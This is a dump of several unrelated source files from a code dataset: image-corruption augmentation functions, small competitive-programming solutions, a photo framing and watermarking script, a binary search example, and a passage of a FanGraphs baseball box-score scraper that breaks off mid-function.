np.roll(squareaccum, shift=-1, axis=1)\n 
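# write the wibbled mean of the four corner values into each square's centre\n            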
maparray[stepsize // 2:mapsize:stepsize,\n stepsize // 2:mapsize:stepsize] = wibbledmean(squareaccum)\n\n def filldiamonds():\n \"\"\"For each diamond of points stepsize apart,\n calculate middle value as mean of points + wibble\"\"\"\n mapsize = maparray.shape[0]\n drgrid = maparray[stepsize // 2:mapsize:stepsize, stepsize // 2:mapsize:stepsize]\n ulgrid = maparray[0:mapsize:stepsize, 0:mapsize:stepsize]\n ldrsum = drgrid + np.roll(drgrid, 1, axis=0)\n lulsum = ulgrid + np.roll(ulgrid, -1, axis=1)\n ltsum = ldrsum + lulsum\n maparray[0:mapsize:stepsize, stepsize // 2:mapsize:stepsize] = wibbledmean(ltsum)\n tdrsum = drgrid + np.roll(drgrid, 1, axis=1)\n tulsum = ulgrid + np.roll(ulgrid, -1, axis=0)\n ttsum = tdrsum + tulsum\n maparray[stepsize // 2:mapsize:stepsize, 0:mapsize:stepsize] = wibbledmean(ttsum)\n\n while stepsize >= 2:\n fillsquares()\n filldiamonds()\n stepsize //= 2\n wibble /= wibbledecay\n\n maparray -= maparray.min()\n return maparray / maparray.max()\n\n\n def clipped_zoom(img, zoom_factor):\n h = img.shape[0]\n # ceil crop height(= crop width)\n ch = int(np.ceil(h / zoom_factor))\n\n top = (h - ch) // 2\n img = scizoom(img[top:top + ch, top:top + ch], (zoom_factor, zoom_factor, 1), order=1)\n # trim off any extra pixels\n trim_top = (img.shape[0] - h) // 2\n\n return img[trim_top:trim_top + h, trim_top:trim_top + h]\n\n\nclass Augmentations:\n\n\n # --------------------Distortions ------------------------\n order = {\n 0 : ['random_erase'],\n 1 : ['color_jitter'],\n 2 : [ 'gaussian_noise', 'shot_noise', 'impulse_noise', 'speckle_noise'],\n 3: ['gaussian_blur', 'defocus_blur', 'motion_blur', 'zoom_blur', 'spatter']\n }\n\n def get_list():\n l = []\n for key in list(Augmentations.order):\n l += Augmentations.order[key]\n\n return l\n\n # Custom - Hendrycks 2019\n def gaussian_noise(x, severity=1):\n c = [.08, .12, 0.18, 0.26, 0.38][severity - 1]\n\n x = np.array(x) / 255.\n return np.clip(x + np.random.normal(size=x.shape, scale=c), 0, 1) * 255\n\n\n def shot_noise(x, severity=1):\n c = [60, 25, 12, 5, 3][severity - 1]\n\n x = np.array(x) / 255.\n return np.clip(np.random.poisson(x * c) / c, 0, 1) * 255\n\n\n def impulse_noise(x, severity=1):\n c = [.015, .06, .09, 0.17, 0.27][severity - 1]\n\n x = sk.util.random_noise(np.array(x) / 255., mode='s&p', amount=c)\n return np.clip(x, 0, 1) * 255\n\n\n def speckle_noise(x, severity=1):\n c = [.15, .2, 0.35, 0.45, 0.6][severity - 1]\n\n x = np.array(x) / 255.\n return np.clip(x + x * np.random.normal(size=x.shape, scale=c), 0, 1) * 255\n\n def gaussian_blur(x, severity=1):\n c = [1, 2, 3, 4, 6][severity - 1]\n\n x = gaussian(np.array(x) / 255., sigma=c, multichannel=True)\n return np.clip(x, 0, 1) * 255\n\n\n def glass_blur(x, severity=1):\n # sigma, max_delta, iterations\n c = [(0.7, 1, 2), (0.9, 2, 1), (1, 2, 3), (1.1, 3, 2), (1.5, 4, 2)][severity - 1]\n\n x = np.uint8(gaussian(np.array(x) / 255., sigma=c[0], multichannel=True) * 255)\n\n # locally shuffle pixels\n for i in range(c[2]):\n for h in range(224 - c[1], c[1], -1):\n for w in range(224 - c[1], c[1], -1):\n dx, dy = np.random.randint(-c[1], c[1], size=(2,))\n h_prime, w_prime = h + dy, w + dx\n # swap\n x[h, w], x[h_prime, w_prime] = x[h_prime, w_prime], x[h, w]\n\n return np.clip(gaussian(x / 255., sigma=c[0], multichannel=True), 0, 1) * 255\n\n\n def defocus_blur(x, severity=1):\n c = [(3, 0.1), (4, 0.5), (6, 0.5), (8, 0.5), (10, 0.5)][severity - 1]\n\n x = np.array(x) / 255.\n kernel = AugmentationHelpers.disk(radius=c[0], alias_blur=c[1])\n\n channels = []\n for 
d in range(3):\n channels.append(cv2.filter2D(x[:, :, d], -1, kernel))\n channels = np.array(channels).transpose((1, 2, 0)) # 3x224x224 -> 224x224x3\n\n return np.clip(channels, 0, 1) * 255\n\n\n def motion_blur(x, severity=1):\n c = [(7, 3), (15, 5), (15, 8), (15, 12), (20, 15)][severity - 1]\n\n output = BytesIO()\n x= Image.fromarray(np.uint8(x))\n x.save(output, format='PNG')\n x = MotionImage(blob=output.getvalue())\n\n x.motion_blur(radius=c[0], sigma=c[1], angle=np.random.uniform(-45, 45))\n\n x = cv2.imdecode(np.fromstring(x.make_blob(), np.uint8),\n cv2.IMREAD_UNCHANGED)\n\n if x.shape != (224, 224):\n return np.clip(x[..., [2, 1, 0]], 0, 255) # BGR to RGB\n else: # greyscale to RGB\n return np.clip(np.array([x, x, x]).transpose((1, 2, 0)), 0, 255)\n\n\n def zoom_blur(x, severity=1):\n c = [np.arange(1, 1.11, 0.01),\n np.arange(1, 1.16, 0.01),\n np.arange(1, 1.21, 0.02),\n np.arange(1, 1.26, 0.02),\n np.arange(1, 1.31, 0.03)][severity - 1]\n\n x = (np.array(x) / 255.).astype(np.float32)\n out = np.zeros_like(x)\n for zoom_factor in c:\n out += AugmentationHelpers.clipped_zoom(x, zoom_factor)\n\n x = (x + out) / (len(c) + 1)\n return np.clip(x, 0, 1) * 255\n\n def fog(x, severity=1):\n c = [(1.5, 2), (2, 2), (2.5, 1.7), (2.5, 1.5), (3, 1.4)][severity - 1]\n size = x.shape[0]\n x = np.array(x) / 255.\n max_val = x.max()\n x += c[0] * AugmentationHelpers.plasma_fractal(mapsize=size, wibbledecay=c[1])[:size, :size][..., np.newaxis]\n return np.clip(x * max_val / (max_val + c[0]), 0, 1) * 255\n\n def spatter(x, severity=1):\n c = [(0.65, 0.3, 4, 0.69, 0.6, 0),\n (0.65, 0.3, 3, 0.68, 0.6, 0),\n (0.65, 0.3, 2, 0.68, 0.5, 0),\n (0.65, 0.3, 1, 0.65, 1.5, 1),\n (0.67, 0.4, 1, 0.65, 1.5, 1)][severity - 1]\n x = np.array(x, dtype=np.float32) / 255.\n\n liquid_layer = np.random.normal(size=x.shape[:2], loc=c[0], scale=c[1])\n\n liquid_layer = gaussian(liquid_layer, sigma=c[2])\n liquid_layer[liquid_layer < c[3]] = 0\n if c[5] == 0:\n liquid_layer = (liquid_layer * 255).astype(np.uint8)\n dist = 255 - cv2.Canny(liquid_layer, 50, 150)\n dist = cv2.distanceTransform(dist, cv2.DIST_L2, 5)\n _, dist = cv2.threshold(dist, 20, 20, cv2.THRESH_TRUNC)\n dist = cv2.blur(dist, (3, 3)).astype(np.uint8)\n dist = cv2.equalizeHist(dist)\n # ker = np.array([[-1,-2,-3],[-2,0,0],[-3,0,1]], dtype=np.float32)\n # ker -= np.mean(ker)\n ker = np.array([[-2, -1, 0], [-1, 1, 1], [0, 1, 2]])\n dist = cv2.filter2D(dist, cv2.CV_8U, ker)\n dist = cv2.blur(dist, (3, 3)).astype(np.float32)\n\n m = cv2.cvtColor(liquid_layer * dist, cv2.COLOR_GRAY2BGRA)\n m /= np.max(m, axis=(0, 1))\n m *= c[4]\n\n # water is pale turqouise\n color = np.concatenate((175 / 255. * np.ones_like(m[..., :1]),\n 238 / 255. * np.ones_like(m[..., :1]),\n 238 / 255. * np.ones_like(m[..., :1])), axis=2)\n\n color = cv2.cvtColor(color, cv2.COLOR_BGR2BGRA)\n x = cv2.cvtColor(x, cv2.COLOR_BGR2BGRA)\n\n return cv2.cvtColor(np.clip(x + m * color, 0, 1), cv2.COLOR_BGRA2BGR) * 255\n else:\n m = np.where(liquid_layer > c[3], 1, 0)\n m = gaussian(m.astype(np.float32), sigma=c[4])\n m[m < 0.8] = 0\n # m = np.abs(m) ** (1/c[4])\n\n # mud brown\n color = np.concatenate((63 / 255. * np.ones_like(x[..., :1]),\n 42 / 255. * np.ones_like(x[..., :1]),\n 20 / 255. 
* np.ones_like(x[..., :1])), axis=2)\n\n            color *= m[..., np.newaxis]\n            x *= (1 - m[..., np.newaxis])\n\n            return np.clip(x + color, 0, 1) * 255\n\n\n    def contrast(x, severity=1):\n        c = [0.4, .3, .2, .1, .05][severity - 1]\n\n        x = np.array(x) / 255.\n        means = np.mean(x, axis=(0, 1), keepdims=True)\n        return np.clip((x - means) * c + means, 0, 1) * 255\n\n    def saturate(x, severity=1):\n        c = [(0.3, 0), (0.1, 0), (2, 0), (5, 0.1), (20, 0.2)][severity - 1]\n\n        x = np.array(x) / 255.\n        x = sk.color.rgb2hsv(x)\n        x[:, :, 1] = np.clip(x[:, :, 1] * c[0] + c[1], 0, 1)\n        x = sk.color.hsv2rgb(x)\n\n        return np.clip(x, 0, 1) * 255\n\n    # Pytorch torchvision transforms\n\n    def brightness(x, severity=1):\n        img = transforms.functional.adjust_brightness(Image.fromarray(x), severity*0.5)\n        return np.array(img)\n\n    #TODO: Make three discrete layers\n    def color_jitter(x, severity=1):\n        b0 = 0.5\n        c0 = 0.5\n        cl0 = 0.5\n        transform = transforms.ColorJitter(brightness=b0*severity, contrast = c0*severity, saturation= cl0*severity)\n        img = transform(Image.fromarray(x))\n        return np.array(img)\n\n    #TODO: Add options to the config\n    def random_erase(x, severity=1):\n        transf2tensor = transforms.ToTensor()\n        transf2PIL = transforms.ToPILImage()\n        transform = transforms.RandomErasing(p=0.8,scale=(0.02,0.02))\n        img = transform(transf2tensor(Image.fromarray(x)))\n\n        return np.array(transf2PIL(img))\n\n\n    methods = {\n        'random_erase': random_erase,\n        'color_jitter': color_jitter,\n        'gaussian_noise': gaussian_noise,\n        'shot_noise': shot_noise,\n        'impulse_noise': impulse_noise,\n        'speckle_noise': speckle_noise,\n        'gaussian_blur': gaussian_blur,\n        'glass_blur': glass_blur,\n        'defocus_blur': defocus_blur,\n        'motion_blur':motion_blur,\n        'zoom_blur':zoom_blur,\n        'fog':fog,\n        'spatter': spatter\n    }\n","repo_name":"kuldeepbrd1/image-corruptions","sub_path":"augmentations.py","file_name":"augmentations.py","file_ext":"py","file_size_in_byte":14944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"5702613607","text":"import sys\nimport math\ninput = sys.stdin.readline\n\nN = int(input().strip())\nA = list(map(int, input().split()))\n\n# Must check primality; note that 0 and 1 are not prime.\ndef test_prime(num):\n    if num == 0 or num == 1:\n        return False\n    for i in range(2, int(math.sqrt(num)) + 1):\n        if num % i == 0:\n            return False\n    return True\n\nresult = 1\nprime_list = []\n# The LCM of distinct primes is just their product.\n# But duplicate values must only be multiplied in once.\n
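# e.g. A = [2, 3, 3, 5]: the duplicate 3 is skipped, so the answer is 2 * 3 * 5 = 30.\n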
for i in range(N):\n    if test_prime(A[i]) and A[i] not in prime_list: # skip primes already used\n        prime_list.append(A[i])\n        result *= A[i]\n\nif result == 1:\n    print(-1)\nelse:\n    print(result)","repo_name":"Kyuber1007/problemsolving","sub_path":"baekjoon/bj21919_소수최소공배수.py","file_name":"bj21919_소수최소공배수.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"15159397289","text":"N = int(input())\r\nscores = []\r\nfor idx in range(0, N):\r\n\tscores.append(list(map(int, input().split())))\r\n\r\nsums = []\r\nfor score in scores:\r\n\tsum = score[0] + score[1] + score[2] + score[3] + score[4]*11/90.0\r\n\tsums.append(sum)\r\n\r\nprint(max(sums))","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc034/A/4867135.py","file_name":"4867135.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"}
{"seq_id":"71669406953","text":"from __future__ import print_function\nimport PIL\nfrom PIL import ImageDraw\nimport os.path\n\n\ndef editPicture():\n    '''Runs a menu for you to choose which functions you want to run.\n    Takes no parameters. The program will ask you for needed parameters\n    when you choose an option.'''\n    #initializes menuOption to 0: a value that shouldn't ever be used except for\n    #here\n\n    menuOption = 0\n    \n\n    directoryChoice = raw_input(\"Please enter the name of the folder you want to change: \")\n    directory = os.path.join(os.getcwd(), directoryChoice)\n    \n    while menuOption != 4:\n        \n        #Gives the user a chance to input and tells them what each input will do.\n        \n        print('\\nEnter 1 for Adding a Frame\\n\\n'\n              + 'Enter 2 for Adding Family Watermark\\n\\n'\n              + 'Enter 3 for Adding both a Border and the Watermark\\n\\nEnter 4 to quit.')\n        print(os.getcwd())\n        \n        try:\n            menuOption = int(raw_input(\"Choice: \"))\n        except ValueError:\n            print(menuOption)\n            print('You must enter a number. Try again.')\n        \n        print(menuOption)\n\n        #Now that the user has chosen an option, test if it is in range.\n        if menuOption < 1 or menuOption > 4:\n            print('You must enter a number between 1 and 4. Try again.')\n        \n        elif menuOption == 1:\n            print('something1')\n            #Insert border function here\n            frame_images(directory)\n        \n        elif menuOption == 2:\n            print('something2')\n            #Insert watermark function here\n            watermark(False, directory)\n        \n        elif menuOption == 3:\n            print('something3')\n            #Insert code to run both programs\n            frame_images(directory)\n            watermark(True, directory)\n        \n        #If the input was out of range, the loop simply repeats.\n\ndef frame_images(directory=None):\n    ''' Saves a modified version of each image in directory.\n\n    Uses current directory if no directory is specified. 
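For example (with a hypothetical\n    folder name): frame_images('Vacation_Photos') saves the framed copies under ./modified.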
\n    Puts images in subdirectory 'modified', creating it if needed.\n    New image files are of type PNG and have transparent rounded corners.\n    '''\n\n    if directory == None:\n        directory = os.getcwd() # Use working directory if unspecified\n\n    # Create a new directory 'modified'\n    new_directory = os.path.join(os.getcwd(), 'modified')\n    try:\n        os.mkdir(new_directory)\n    except OSError:\n        pass # if the directory already exists, proceed\n\n    # Load all the images\n    image_list, file_list = get_images(directory)\n\n    # Go through the images and save modified versions\n    for n in range(len(image_list)):\n        # Parse the filename\n        filename, filetype = os.path.splitext(file_list[n])\n        \n        # Round the corners with radius = 30% of short side\n        new_image = round_corners(image_list[n],.30)\n        # Save the altered image, using PNG to retain transparency\n        new_image_filename = os.path.join(new_directory,filename + '.png')\n        new_image.save(new_image_filename)\n    \n    \ndef round_corners(original_image, percent_of_side):\n    \"\"\" Rounds the corners of a PIL.Image\n    \n    original_image must be a PIL.Image\n    Returns a new PIL.Image with rounded corners, where\n    0 < percent_of_side < 1\n    is the corner radius as a portion of the shorter dimension of original_image\n    \"\"\"\n    #set the radius of the rounded corners\n    width, height = original_image.size\n    radius = int(percent_of_side * min(width, height)) # radius in pixels\n    \n    ###\n    #create a mask\n    ###\n    \n    #start with transparent mask\n    rounded_mask = PIL.Image.new('RGBA', (width, height), (127,0,127,0))\n    drawing_layer = ImageDraw.Draw(rounded_mask)\n    \n    # Overwrite the RGBA values with A=255.\n    # The 127 for RGB values was used merely for visualizing the mask\n    \n    # Draw a rectangle to fill the interior with opaqueness\n    drawing_layer.polygon([(radius-75,25),(width-radius+75,25),\n                (width-radius+75,height-25),(radius-75,height-25)],\n                fill=(127,0,127,255))\n\n    \n    # Uncomment the following line to show the mask\n    # plt.imshow(rounded_mask)\n    \n    # Make the new image, starting with all transparent\n    result = PIL.Image.new('RGBA', original_image.size, (255,255,255,255))\n    result.paste(original_image, (0,0), mask=rounded_mask)\n    return result\n    \n    \ndef get_images(directory=None):\n    ''' Returns PIL.Image objects for all the images in directory.\n\n    If directory is not specified, uses current directory.\n    Returns a 2-tuple containing \n    a list with a PIL.Image object for each image file in root_directory, \n    and a list with a string filename for each image file in root_directory\n    '''\n\n    if directory == None:\n        directory = os.getcwd() # Use working directory if unspecified\n\n    image_list=[] # Initialize aggregators\n    file_list = []\n\n    directory_list = os.listdir(directory) # Get list of files\n    for entry in directory_list:\n        absolute_filename = os.path.join(directory, entry)\n        try:\n            image = PIL.Image.open(absolute_filename)\n            file_list += [entry]\n            image_list += [image]\n        except IOError:\n            pass # do nothing with errors trying to open non-images\n    return image_list, file_list\n    \n    \ndef watermark(allFunctions = False, directory = None):\n    '''Inserts a watermark into the image.\n    Takes a boolean argument indicating whether you are running all the functions'''\n    print (directory)\n    watermark = PIL.Image.open(os.path.join(os.getcwd(), 'NuamesLogo.png'))\n    directory = os.path.join(os.getcwd(), 'modified')\n    try:\n        os.mkdir(os.path.join(os.getcwd(), 'modified'))\n    except OSError:\n        pass # if the directory already exists, proceed\n    \n    print(directory)\n    
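# Stamp the logo onto every image in 'modified', scaled to a quarter of each image's size\n    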
image_list, file_list = get_images(directory)\n    for n in range(len(image_list)):\n        # Parse the filename\n        modifiedImage = image_list[n]\n        \n        filename, filetype = os.path.splitext(file_list[n])\n        \n        width, height = modifiedImage.size\n        \n        #Resize the watermark to a fourth of the image size\n        watermark_small = watermark.resize((width/4, height/4))\n        \n        try:\n            modifiedImage.paste(watermark_small, (20,20), mask=watermark_small)\n            \n            modifiedImage_filename = os.path.join(directory,filename + '.png')\n            \n            modifiedImage.save(modifiedImage_filename)\n        except KeyError:\n            pass","repo_name":"supershesh/1.4.7Family","sub_path":"FamilyPictureModifier.py","file_name":"FamilyPictureModifier.py","file_ext":"py","file_size_in_byte":6541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"1917743169","text":"arr = [1, 2, 3, 5, 6, 7, 8, 9, 10, 11]\n\n# Core logic:\n# find the middle index of the current search range.\n# The array must be sorted before searching.\n\n\ndef binarySearch(arr, targetNum):\n\n    start = 0\n    end = len(arr) - 1 # indices start at 0\n\n    while start <= end: # loop until start passes end\n        midIndex = (start + end) // 2 # floor division keeps the index an integer\n        midValue = arr[midIndex]\n\n        if midValue == targetNum:\n            return midIndex\n        elif midValue < targetNum:\n            start = midIndex + 1\n        else:\n            end = midIndex - 1\n\n    return -1 # target not found\n\n\nprint(binarySearch(arr, 7))\n","repo_name":"sangyunpark99/Baekjoon_Algorithm","sub_path":"헤이밥/알고리즘기본개념/이진탐색.py","file_name":"이진탐색.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"18612601579","text":"\"\"\"\n10) A machine takes 17 seconds to produce one part. Write a program that reads the number of \nparts to be produced and shows the time, in hours, minutes and seconds, needed to produce \nthat many parts. For example, if an operator wants to produce 4 parts, the machine would take 68 \nseconds. In that case, the program would answer: 0 hours, 1 minute and 8 seconds. In your answer, \ngive only the numbers, separated by a single space. For example: 0 1 8.\n\"\"\"\n
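# Worked example from the statement: 4 parts -> 4 * 17 = 68 s total;\n# 68 // 3600 = 0 h, (68 % 3600) // 60 = 1 min, 68 % 60 = 8 s, so it prints \"0 1 8\".\n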
\n\"\"\"\nnpeca = int(input(\"Digite o número de peças que deseja produzir: \"))\n\ntempo_peca = 17 # Tempo em segundos para produzir uma peça\n\ntempo_total_segundos = npeca * tempo_peca\nhoras = tempo_total_segundos // 3600\nminutos = (tempo_total_segundos % 3600) // 60\nsegundos = tempo_total_segundos % 60\n\nprint(f\"{horas} {minutos} {segundos}\")\n","repo_name":"vkendis/UNIFEI-SIN","sub_path":"Python/003_Lista_intro/Ex_010.py","file_name":"Ex_010.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18716793255","text":"import argparse \nfrom api import start_stream\n\n# args\nparser = argparse.ArgumentParser()\nparser.add_argument('topic', help='a twitter trend you\\'d like to analyze')\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n start_stream(args.topic)","repo_name":"danielgrijalva/sentiment-analysis","sub_path":"app/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33485560466","text":"import pandas as pd\r\nimport requests\r\nimport urllib\r\nimport numpy as np\r\n\r\nimport os.path\r\nfrom os import path\r\n\r\nfrom bs4 import BeautifulSoup\r\n\r\nfrom datetime import datetime\r\nfrom datetime import timedelta\r\n\r\nimport time\r\nimport random\r\n\r\nfrom tqdm import tqdm\r\n\r\nimport sys \r\n\r\n\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\n\r\n\r\n#General functions\r\n\r\n#Function to produce unique match IDs\r\ndef numerise_string(x):\r\n\r\n\talphabet = \"abcdefghijklmnopqrstuvwxyz\"\r\n\ttag = \"\"\r\n\r\n\tfor letters in x:\r\n\t\ttag = tag + str(alphabet.find(letters.lower()))\r\n\r\n\treturn tag\r\n\r\n\r\n#Custom append function used for auto-save purposes\r\ndef update_frame(data, new_data):\r\n\r\n\tif len(data) == 0:\r\n\t\treturn new_data\r\n\telse:\r\n\t\treturn data.append(new_data)\r\n\r\n\r\n\r\n\r\ndef string_to_array(x):\r\n\r\n\t\tdummy = \"abcdefghijklmnopqrstuvwxyz\"\r\n\t\talphabet = []\r\n\t\tfor letters in dummy:\r\n\t\t\talphabet.append(letters)\t\r\n\t\talphabet = np.array(alphabet)\t\t\r\n\r\n\t\tarr = []\r\n\r\n\t\tfor letters in x.lower():\r\n\t\t\tarr.append(np.where(alphabet == letters)[0][0])\t\r\n\r\n\t\treturn np.array(arr)\r\n\r\n\r\ndef match_two_names(x, y):\r\n\r\n\tx_arr = string_to_array(x)\r\n\ty_arr = string_to_array(y)\r\n\r\n\tn = len(x_arr)\r\n\tm = len(y_arr)\r\n\tn_try = m - n + 1\r\n\r\n\tif n_try > 0:\r\n\t\tmatch_p = []\r\n\r\n\t\tfor i in range(0, n_try):\r\n\t\t\tv = x_arr - y_arr[0:n]\r\n\t\t\tmatch_p.append(len(np.where(v == 0)[0]) / n)\r\n\t\t\ty_arr = y_arr[1:]\r\n\r\n\r\n\r\n\r\n\r\nclass Baseball_Scrapper:\r\n\r\n\tdef __init__(self, file_path):\r\n\r\n\t\tself.file_path = file_path\r\n\t\tdir_path = file_path + \"/MLB_Modeling\"\r\n\r\n\t\t#Create the repositories if they do not exist\r\n\t\t#Main repo\r\n\t\ttarget = file_path + \"/MLB_Modeling\"\r\n\t\tif not path.exists(target):\r\n\t\t\tos.mkdir(target)\r\n\t\t\tprint(\"Main directory created at:\" + \"\\t\" + target)\r\n\r\n\t\t#Sub-repo\r\n\t\tsub_directories = [\"Bat\", \"Pitch\", \"Scores\", \"Betting\", \"Misc\"]\r\n\t\tfor element in sub_directories:\r\n\r\n\t\t\ttarget = dir_path + \"/\" + element\r\n\t\t\tif not path.exists(target):\r\n\t\t\t\tos.mkdir(target)\r\n\t\t\t\tprint(\"Sub-directory created at:\" + \"\\t\" + target)\r\n\r\n\r\n\t\t#Sub-repo locations\r\n\t\tself.paths = 
[]\r\n\t\tfor element in sub_directories:\r\n\t\t\tself.paths.append(dir_path + \"/\" + element)\r\n\r\n\r\n\t\tdictio_path = self.paths[4] + \"/Abreviations_Dictionary.csv\"\r\n\t\tif path.exists(dictio_path):\r\n\t\t\tself.dictio = pd.read_csv(dictio_path)\r\n\t\telse:\r\n\t\t\tself.dictio = []\r\n\r\n\r\n\t\tprint(\"Scrapper successfully initiated.\")\r\n\r\n\r\n\t#Updates a file, or saves it if it doesn't exist\r\n\tdef update_file(self, save_path, file_name, data):\r\n\r\n\t\tfinal_path = save_path + \"/\" + file_name\r\n\r\n\t\ttry:\r\n\t\t\tif not path.exists(final_path):\r\n\t\t\t\tif len(data) > 0:\r\n\t\t\t\t\tdata.to_csv(final_path, index = False)\r\n\r\n\t\t\telse:\r\n\t\t\t\tif len(data) > 0:\r\n\t\t\t\t\tpd.read_csv(final_path).append(data).drop_duplicates().to_csv(final_path, index = False)\r\n\r\n\t\texcept:\r\n\t\t\tprint(\"Failed to update file.\")\r\n\r\n\r\n\r\n\t#Translates a team name to its city name\r\n\tdef Translate_Team_Names(self, value, want):\r\n\r\n\t\tif len(self.dictio) == 0:\r\n\t\t\tsys.exit(\"Missing file:\" + \"\\t\" + self.paths[4] + \"/Abreviations_Dictionary.csv\")\r\n\t\telse:\r\n\t\t\tx = self.dictio\r\n\r\n\t\tm = len(x.columns)\r\n\r\n\r\n\t\tfor j in range(0, m):\r\n\t\t\tlocation = np.where(x.iloc[:, j] == value)[0]\r\n\r\n\t\t\tif len(location) > 0:\r\n\t\t\t\treturn x.at[location[0], want]\r\n\r\n\r\n\t#Frame-wide translate\r\n\tdef Fix_Team_Names(self, frame, want):\r\n\r\n\t\tfor col in frame.columns:\r\n\r\n\t\t\tif \"Team\" in col or \"Opponent\" in col:\r\n\r\n\t\t\t\tvector = np.array(list(frame[col]))\r\n\t\t\t\tvalues = np.array(list(set(vector)))\r\n\r\n\t\t\t\tm = np.where(frame.columns == col)[0][0]\r\n\r\n\t\t\t\tfor team in values:\r\n\r\n\t\t\t\t\tindex = np.where(vector == team)[0]\r\n\t\t\t\t\tproper_name = self.Translate_Team_Names(team, want)\r\n\t\t\t\t\t\r\n\t\t\t\t\tframe.iloc[index, m] = proper_name\r\n\r\n\t\treturn frame\r\n\r\n\r\n\r\n\r\n\t###########################################################\r\n\t###########################################################\r\n\t######################## WORK FLOW ########################\r\n\t###########################################################\r\n\t###########################################################\r\n\r\n\r\n\t###########################################################\r\n\t#################### WEB SCRAPPING ########################\r\n\t###########################################################\r\n\r\n\r\n\t#Attempts to extract game URLs from a certain date\r\n\t#Is used inside a loop\r\n\tdef Scrape_FanGraphs_game_url(self, date):\r\n\r\n\t\turl = \"https://www.fangraphs.com/scoreboard.aspx?date=\" + date\r\n\r\n\t\thtml = requests.get(url).content\r\n\t\thtml_content = BeautifulSoup(html, 'lxml')\r\n\r\n\t\tlinks = html_content.findAll('a')\r\n\t\tgame_url = []\r\n\r\n\t\tfor link in links:\r\n\t\t\ttry:\r\n\t\t\t\thref = link.attrs['href']\r\n\t\t\texcept:\r\n\t\t\t\tcontinue\r\n\r\n\t\t\tif \"boxscore\" in href:\r\n\t\t\t\tgame_url.append(\"https://www.fangraphs.com/\" + href)\r\n\r\n\t\treturn game_url\r\n\r\n\r\n\t#Scrapes FanGraphs.com for urls to games that were played between two dates (frm, to)\r\n\t#Is used to initiate the database\r\n\t#Once done, the UPDATE_FanGraphs_Box_Scores method should be used\r\n\tdef Get_FanGraphs_Game_URLs(self, frm, to):\r\n\r\n\t\tbegin = datetime.strptime(frm, \"%Y-%m-%d\")\r\n\t\tend = datetime.strptime(to, \"%Y-%m-%d\")\r\n\r\n\t\tn = (end - begin).days + 1\r\n\r\n\t\turls = pd.DataFrame(columns = 
[\"URL\"])\r\n\t\tno_games_dates = pd.DataFrame(columns = [\"Dates\"])\r\n\t\tgames_dates = pd.DataFrame(columns = [\"Dates\"])\r\n\r\n\r\n\t\t#Check for dates which links were already scrapped\r\n\t\tif path.exists(self.paths[-1] + \"/Game_Dates.csv\"):\r\n\t\t\tdates_done = list(pd.read_csv(self.paths[-1] + \"/Game_Dates.csv\")[\"Dates\"])\r\n\t\telse:\r\n\t\t\tdates_done = []\r\n\r\n\t\t#Main loop (extraction + auto-save)\r\n\t\tfor i in tqdm(range(0, n)):\r\n\r\n\t\t\tdate = datetime.strftime(begin, \"%Y-%m-%d\")\r\n\r\n\t\t\t#Avoid extracting for certain cases\r\n\t\t\tif (begin.month < 3) or (begin.month > 10) or (date in dates_done):\r\n\t\t\t\tbegin = begin + timedelta(days = 1)\r\n\t\t\t\tcontinue\r\n\r\n\t\t\t#Retrieve links\r\n\t\t\ttry:\r\n\t\t\t\ttodays_url = self.Scrape_FanGraphs_game_url(date)\r\n\t\t\texcept:\r\n\t\t\t\tno_games_dates = no_games_dates.append(pd.DataFrame(date, columns = [\"Dates\"]))\r\n\t\t\t\tbegin = begin + timedelta(days = 1)\r\n\t\t\t\tcontinue\r\n\r\n\t\t\tif len(todays_url) > 0:\r\n\t\t\t\turls = urls.append(pd.DataFrame(todays_url, columns = [\"URL\"]))\r\n\t\t\t\tgames_dates = games_dates.append(pd.DataFrame([date], columns = [\"Dates\"])) \r\n\r\n\t\t\t\tprint(\"Scrapped:\" + \"\\t\" + date)\r\n\r\n\r\n\t\t\t#Saving procedure (trigerred every 20 iterations)\r\n\t\t\tif (i + 1) % 20 == 0 or begin == end:\r\n\r\n\t\t\t\tself.update_file(self.paths[-1], \"Game_URLs.csv\", urls)\r\n\t\t\t\turls = pd.DataFrame(columns = [\"URL\"])\r\n\r\n\t\t\t\tself.update_file(self.paths[-1], \"No_Game_Dates.csv\", no_games_dates)\r\n\t\t\t\tno_games_dates = pd.DataFrame(columns = [\"Dates\"])\r\n\r\n\t\t\t\tself.update_file(self.paths[-1], \"Game_Dates.csv\", games_dates)\r\n\t\t\t\tgames_dates = pd.DataFrame(columns = [\"Dates\"])\t\t\t\r\n\r\n\t\t\t\tprint(\"Saved data.\")\r\n\r\n\r\n\t\t\tbegin = begin + timedelta(days = 1)\r\n\t\t\ttime.sleep(random.randint(5, 10))\r\n\r\n\t\tprint(\"Done.\")\r\n\r\n\r\n\r\n\t#Get the Box Scores data based off a URL \r\n\tdef Scrape_FanGraphs_game_stats_by_url(self, ulr):\r\n\r\n\t\thtml = requests.get(url).content\r\n\t\ttables = pd.read_html(html)\r\n\r\n\t\t#Date and team names\r\n\t\turl_split = url.split(\"-\")\r\n\t\tdate = url_split[0].split(\"=\")[-1] + \"-\" + url_split[1] + \"-\" + url_split[2].split(\"&\")[0]\r\n\r\n\t\tdate_index = -1\r\n\t\tfor table in tables:\r\n\t\t\tdate_index += 1\r\n\t\t\tif table.iloc[0,0] == \"Team\":\r\n\t\t\t\tbreak\t\r\n\r\n\t\thome_team = tables[date_index].iloc[2, 0]\r\n\t\taway_team = tables[date_index].iloc[1, 0]\t\r\n\r\n\t\t#Score\r\n\t\thome_score = tables[date_index].iloc[2, -1]\r\n\t\taway_score = 